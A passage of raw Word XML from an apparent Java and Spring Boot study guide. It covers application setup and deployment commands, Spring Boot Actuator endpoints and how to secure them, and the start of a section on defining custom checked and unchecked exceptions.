    <w:p w14:paraId="2D681134"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dependency&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C68C9B7"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dependency&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B0F3272"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org.springframework.boot&lt;/groupId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="010F0567"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spring-boot-starter-security&lt;/artifactId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="384EE68F"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dependency&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45EFC0E2"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ies&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19C7879A" w14:textId="77777777" w:rsidR="00ED494A" w:rsidRPr="002C6305" w:rsidRDefault="00ED494A"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7. Implement Database Models (Optional)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16A9EF32"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f you're using a database, create model classes annotated with JPA annotations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="104A1940"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05B755B0"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tity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="655F0592"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Employee {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09659A91"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Id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19E76F11"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neratedValue(strategy = GenerationType.IDENTITY)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E9C901A"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Long id;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="375126BD"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String name;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F47ECB6"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String position;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4550E9F8" w14:textId="77777777" w:rsidR="00ED494A" w:rsidRPr="002C6305" w:rsidRDefault="00ED494A" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C2C9F7E"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Getters and Setters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66EF7ACA"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0C46854E" w14:textId="77777777" w:rsidR="00ED494A" w:rsidRPr="002C6305" w:rsidRDefault="00ED494A"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lastRenderedPageBreak/>
        <w:t>8. Run the Application</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0874C6B9"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run the application by:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02F86254" w14:textId="77777777" w:rsidR="00ED494A" w:rsidRPr="002C6305" w:rsidRDefault="00ED494A"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ing the IDE</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Run the main() method of the @SpringBootApplication class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DE0F00F" w14:textId="77777777" w:rsidR="00ED494A" w:rsidRPr="002C6305" w:rsidRDefault="00ED494A"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ing Command Line</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Run mvn spring-boot:run or ./mvnw spring-boot:run if you're using Maven, or ./gradlew bootRun for Gradle.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09662421" w14:textId="77777777" w:rsidR="00ED494A" w:rsidRPr="002C6305" w:rsidRDefault="00ED494A"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9. Testing the Application</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E84C4B4"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est the endpoints using Postman or any API testing tool.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="367B0881"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ccess the REST API, for example: http://localhost:8080/hello.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="290211E9" w14:textId="77777777" w:rsidR="00ED494A" w:rsidRPr="002C6305" w:rsidRDefault="00ED494A"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0. Build and Deploy (Optional)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F75D157"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Build</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Package the application into a JAR file by running:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75ECCB32"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mvn clean package</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="183C4024"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eploy</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Deploy the JAR file to a server (e.g., AWS, Azure, Heroku) or run it locally with:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A756C09"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java -jar target/springbootapp-0.0.1-SNAPSHOT.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65BE6FA2" w14:textId="77777777" w:rsidR="00ED494A"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C5B4DBA">
          <v:rect id="_x0000_i2600" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="55CD75F0" w14:textId="77777777" w:rsidR="00ED494A" w:rsidRPr="002C6305" w:rsidRDefault="00ED494A"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ummary Steps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46325B18"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t up the development environment (JDK, IDE, Maven/Gradle).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14DD7892"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reate a Spring Boot application using Spring Initializr or IDE.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F672C25"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e application settings (application.properties).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04153647"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reate necessary Java classes for controllers, services, and repositories.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CCFE310"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dd dependencies in pom.xml or build.gradle.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E46A92B"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lement models (if needed) and configure database connections.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47D48D9E"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un the application using your IDE or command line.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4049CCAD"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est the application and deploy if needed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A3DE05D" w14:textId="77777777" w:rsidR="00ED494A" w:rsidRPr="002C6305" w:rsidRDefault="00ED494A"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is the basic workflow for creating a Spring Boot application from scratch.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1298B804" w14:textId="40D7A144"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9496C96">
          <v:rect id="_x0000_i2601" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="43C97005" w14:textId="4A0470CD" w:rsidR="009D6DE9" w:rsidRPr="00CE4B95" w:rsidRDefault="00433241">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="611" w:name="_Toc196308091"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What are Actuators in spring boot applications</w:t>
      </w:r>
      <w:r w:rsidR="009D6DE9" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="611"/>
    </w:p>
    <w:p w14:paraId="5197FB6C" w14:textId="3B0B174E" w:rsidR="00163EF6" w:rsidRPr="002C6305" w:rsidRDefault="00163EF6"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ring Boot Actuators</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> are a set of production-ready features that help monitor and manage Spring Boot applications. They provide valuable insights into the health, metrics, and other key attributes of your application in real-time. These features are useful for monitoring and managing applications in production environments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E954D0E" w14:textId="77777777" w:rsidR="00163EF6" w:rsidRPr="002C6305" w:rsidRDefault="00163EF6"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Key Features of Spring Boot Actuator:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50B9DE5D"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Health Checks</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Actuators expose health information, such as database connection health, disk space, and other custom health indicators. This helps in checking if the application is running as expected.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05946C2E"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Metrics</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Provides metrics like the number of requests, response times, memory usage, active threads, etc. This helps in tracking the performance and resource consumption of the application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A06E4BF"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pplication Info</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Exposes details about the application, such as version, build time, and other metadata.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65824A87"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udit Events</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Tracks events related to the application, such as authentication, authorization, and other important application-level events.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52720066"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Logging</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Allows you to manage logging levels in your application dynamically via HTTP endpoints, which is useful for troubleshooting.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A861D59"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Thread Dump</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Exposes a thread dump endpoint to analyze the threads running in the application, useful for debugging issues like thread blocking or deadlocks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0620C670"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nvironment Information</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Provides information about the environment properties, such as system properties, configuration properties, and environment variables.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="326967C4"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ustom Endpoints</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: You can also create custom actuator endpoints to expose application-specific metrics or operations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10BEA312" w14:textId="77777777" w:rsidR="00163EF6" w:rsidRPr="002C6305" w:rsidRDefault="00163EF6"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How to Enable Actuators in Spring Boot:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C82AD59"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o enable Spring Boot Actuator, add the following dependency to your pom.xml (if you're using Maven):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C4117EF"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283FF52E"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org.springframework.boot&lt;/groupId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38ADB8E2"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spring-boot-starter-actuator&lt;/artifactId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B9A8167"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71633B4F"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Or, if using Gradle, add this dependency:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06E73F50"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lementation 'org.springframework.boot:spring-boot-starter-actuator'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70748C0B" w14:textId="77777777" w:rsidR="00163EF6" w:rsidRPr="002C6305" w:rsidRDefault="00163EF6"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Commonly Used Endpoints:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="422D73BD"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ctuator/health</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Provides health information about the application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64BDE94F" w14:textId="77777777" w:rsidR="00163EF6" w:rsidRPr="002C6305" w:rsidRDefault="00163EF6"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Example: http://localhost:8080/actuator/health</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64AC58C2"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ctuator/metrics</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Exposes metrics about the application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42D5FB3E" w14:textId="77777777" w:rsidR="00163EF6" w:rsidRPr="002C6305" w:rsidRDefault="00163EF6"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 http://localhost:8080/actuator/metrics</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26146187"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ctuator/info</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Exposes application information, such as build version, environment details, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76EE3003" w14:textId="77777777" w:rsidR="00163EF6" w:rsidRPr="002C6305" w:rsidRDefault="00163EF6"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 http://localhost:8080/actuator/info</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AB4D73B"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ctuator/env</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Provides information about environment properties.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76B1BAE3" w14:textId="77777777" w:rsidR="00163EF6" w:rsidRPr="002C6305" w:rsidRDefault="00163EF6"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 http://localhost:8080/actuator/env</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B5B891C"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ctuator/heapdump</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Provides a heap dump of the application (useful for memory analysis).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21A7A75A" w14:textId="77777777" w:rsidR="00163EF6" w:rsidRPr="002C6305" w:rsidRDefault="00163EF6"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 http://localhost:8080/actuator/heapdump</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37CBF9AB"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ctuator/threaddump</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Provides a thread dump of the application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2735E406" w14:textId="77777777" w:rsidR="00163EF6" w:rsidRPr="002C6305" w:rsidRDefault="00163EF6"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 http://localhost:8080/actuator/threaddump</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="597977EB" w14:textId="77777777" w:rsidR="00163EF6" w:rsidRPr="002C6305" w:rsidRDefault="00163EF6"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ecuring Actuator Endpoints:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23FA65FD"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ctuator endpoints can be secured using Spring Security to ensure that only authorized users can access them. For example, you can configure the security settings for actuator endpoints in application.properties:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="582758CD"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management.endpoints.web.exposure.include=health,info,metrics</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78868BA8"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management.endpoints.web.exposure.exclude=shutdown</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CA8AE68"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this case, only the health, info, and metrics endpoints will be exposed, and the shutdown endpoint will be excluded.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E37A7B8"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o secure the endpoints, you can configure authentication using Spring Security:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="482A12D0"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security.user.name=admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11208EA8"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security.user.password=adminpassword</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="290D7563" w14:textId="77777777" w:rsidR="00163EF6" w:rsidRPr="002C6305" w:rsidRDefault="00163EF6"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Conclusion:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="045D0CD8"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 Boot Actuators provide crucial monitoring and management features to keep track of application health, performance, and other important metrics. By exposing valuable insights, they make it easier to debug, troubleshoot, and manage Spring Boot applications in production environments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E70AFDF" w14:textId="2462EE83"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8B50A90">
          <v:rect id="_x0000_i2602" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="692732FC" w14:textId="2A4E61EE" w:rsidR="009D6DE9" w:rsidRPr="00CE4B95" w:rsidRDefault="00433241">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="612" w:name="_Toc196308092"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What are custom exceptions? How do you define your own custom exception</w:t>
      </w:r>
      <w:r w:rsidR="009D6DE9" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="612"/>
    </w:p>
    <w:p w14:paraId="70D8EEEF" w14:textId="5D6D1FBA" w:rsidR="00163EF6" w:rsidRPr="002C6305" w:rsidRDefault="00163EF6"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ustom exceptions</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in Java are user-defined exceptions that allow developers to handle specific error conditions in a more meaningful and controlled way. They are useful when the standard Java exceptions (like NullPointerException, IOException, etc.) do not provide the level of specificity required for your application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D532A8E" w14:textId="77777777" w:rsidR="00163EF6" w:rsidRPr="002C6305" w:rsidRDefault="00163EF6"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teps to Define a Custom Exception in Java:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A945A70"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reate a new class that extends Exception or RuntimeException</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="785E2DC9" w14:textId="77777777" w:rsidR="00163EF6" w:rsidRPr="002C6305" w:rsidRDefault="00163EF6"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f the exception is a </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>checked exception</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, extend the Exception class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="500F7393" w14:textId="77777777" w:rsidR="00163EF6" w:rsidRPr="002C6305" w:rsidRDefault="00163EF6"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f the exception is an </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>unchecked exception</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, extend the RuntimeException class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BD1BC78"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efine constructors</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38384147" w14:textId="77777777" w:rsidR="00163EF6" w:rsidRPr="002C6305" w:rsidRDefault="00163EF6"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typically define constructors that allow you to pass a message or cause (stack trace) to the exception.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="612D1A08"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Optionally, override methods like toString() or getMessage()</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for customizing the exception output if needed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A4C8B90" w14:textId="77777777" w:rsidR="00163EF6" w:rsidRPr="002C6305" w:rsidRDefault="00163EF6"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Example of a Custom Checked Exception:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0592C0F3"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InvalidUserInputException extends Exception {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A00CF24"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Constructor that accepts a message</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C178001"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InvalidUserInputException(String message) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C967DBA"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uper(message);  // Passing the message to the superclass</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="646240D4"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285DF363" w14:textId="77777777" w:rsidR="00163EF6" w:rsidRPr="002C6305" w:rsidRDefault="00163EF6" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="374EE5CC"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Constructor that accepts a message and a cause (another Throwable)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68D28BDD"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InvalidUserInputException(String message, Throwable cause) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="704C856F"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uper(message, cause);  // Passing the message and cause to the superclass</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42A7DF99"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D39B631"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A0F45D2" w14:textId="77777777" w:rsidR="00163EF6" w:rsidRPr="002C6305" w:rsidRDefault="00163EF6"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Example of a Custom Unchecked Exception:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66F68931"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DataNotFoundException extends RuntimeException {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AF9F8F7"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Constructor that accepts a message</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02D0DF3F"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DataNotFoundException(String message) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22111A41"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uper(message);  // Passing the message to the superclass</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0528E318"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0C9CD209" w14:textId="77777777" w:rsidR="00163EF6" w:rsidRPr="002C6305" w:rsidRDefault="00163EF6" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="77324D3A"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Constructor that accepts a message and a cause</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FC99F7B"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DataNotFoundException(String message, Throwable cause) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54F823CC"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uper(message, cause);  // Passing the message and cause to the superclass</w:t>
      </w:r>
    </w:p>
